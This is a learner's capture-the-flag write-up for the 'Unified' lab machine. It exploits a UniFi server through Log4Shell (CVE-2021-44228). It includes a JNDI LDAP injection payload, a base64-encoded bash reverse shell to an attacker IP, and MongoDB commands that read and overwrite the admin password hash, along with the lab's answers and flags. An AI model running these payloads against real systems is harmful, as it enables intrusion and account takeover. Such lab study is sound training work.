Penetration testing learning day8

---

Target drone: Unified

Task1

Question: What are the first four open ports?

22,6789,8080,8443

Scan with nmap

Task2

Question: What is the title of the software running on port 8443?

UniFi Network

Scan again with nmap

nmap -sV -v -sC -p 8443 --min-rate 1000 10.129.96.149

Task3

Question: What version of the software is running?

6.4.54

We can know from the nmap scan results that there is http service on port 8080
Visit to get the version

Task4

Question: What is the CVE of the identified vulnerability?

 CVE-2021-44228

Just go online and search for vulnerabilities in this version.

5-14Problem solving process

It is found that there is a log4j vulnerability. We capture the packet/api/login and construct the statement
to verify whether the payload exists in the Log4j vulnerability

{
    "username":"1",
    "password":"1",
    "remember":"${jndi:ldap://10.10.14.212/whatever}",
    "strict":true
}

LDAP Lightweight Directory Access Protocol, default port 389, if there is a vulnerability to send a payload message, the data message will be sent to the local 389 end
Let’s set up a monitor

sudo tcpdump -i tun0 port 389

Note: tcpdump is a program of wireshark that can intercept

It can be found that the interception is successful, indicating that the target host accesses the local ldap port through port 37900
The tool preparation is as follows

准备工具：
openjdk-11-jdk
sudo apt-get install openjdk-11-jdk -y 
Maven
sudo apt-get install maven -y
编译maven
git clone https://github.com/veracode-research/rogue-jndi
cd rogue-jndi 
//这里要换成阿里云的源，不然下载速度很慢
mvn package  

Then prepare to rebound the shell

Execute the following command

java -jar target/RogueJndi-1.1.jar --command "bash -c {echo,YmFzaCAtYyAnYmFzaCAtaSA+JiAvZGV2L3RjcC8xMC4xMC4xNC4yMTIvMTAyOCAwPiYxJw==}|{base64,-d}|{bash,-i}" --hostname "10.10.14.212"

Then start monitoring and send bp
Rebound shell successfully

Then find the user's flag first

Check the mongdb port status

ps aux | grep mongo

bin/mongod in the query results --dbpath /usr/lib/unifi/data/db --port 27117 --unixSocketPrefix /usr/lib/unifi/run --logRotate reopen --logappend --logpath /usr/lib/ unifi/logs/mongod.log --pidfilepath /usr/lib/unifi/run/mongod.pid --bind_ip 127.0.0.1 is the path and parameters of the running command or executable file, indicating that the port is 27117

Try to read the administrator password, the default database ace of the UniFi program, and query the data of the admin table

mongo --port 27117 ace --eval "db.admin.find().forEach(printjson);"

Note: Parameter –eval

Discover the encrypted information of the administrator's account information and password
x_shadow is the password hash, and the SHA-512 algorithm uses a code beginning with $Hash\; the\; 16-character\; string\; salt\; starting\; with\; 6$

以$6$开头的，表明是用SHA-512加密的；
以$1$开头的，表明是用MD5加密的；
以$2$开头的，表明是用Blowfish加密的；
以$5$开头的，表明是用 SHA-256加密的。星号代表帐号被锁定

ps：是在linux shadow文件才这么表示

Of course, you can directly use the tool hashid to decrypt the encryption method and find that it is sha512
Because it is a hash function, it cannot be cracked, so you can only use the replacement method
Replace the administrator key in mongdb, encrypt admin as follows
Use the syntax of nosql, update as follows

mongo --port 27117 ace --eval 'db.admin.update({"_id": ObjectId("61ce278f46e0fb0012d47ee4")},{$set:{"x_shadow":"$6$jaYBW0iCZNXzIuZk$FtGH/we0.hTsf63jTv6fh3sgcPP/J0uIXKXp0ADNWelcqW0ykcTiwnkvI.YePmnRpYMKZ24cqsSCxxg2RtBBs1"}})'

Then you can take a look and you will find that the key has been changed to the admin we set up
We log in directly, and in the settings we find that ssh connection is allowed and we know the root password a>

ssh connection successful

Continue to get the root flag

Task5

Question: What protocol does JNDI utilize in injection?

ldap

Task6

Question: What tools do we use to intercept traffic, indicating a successful attack?

tcpdump

Task7

Question: Which port do we need to intercept traffic transmission?

389

Task8

Question: On which port is the MongoDB service running?

27117

Task9

Question: What is the default database name for UniFi applications?

ace

Task 10

Question: In MongoDB, what is the function we use to enumerate the users in the database?

db.admin.find()

Task11

Question: In MongoDB, what is the function we use to update a user in the database?

db.admin.update()

Task12

Question: root password

NotACrackablePassword4U2022

Submit user flag

6ced1a6a89e666c0620cdb10262ba127

Submit root flag

e50bc93c75b634e4b272d2f771c33681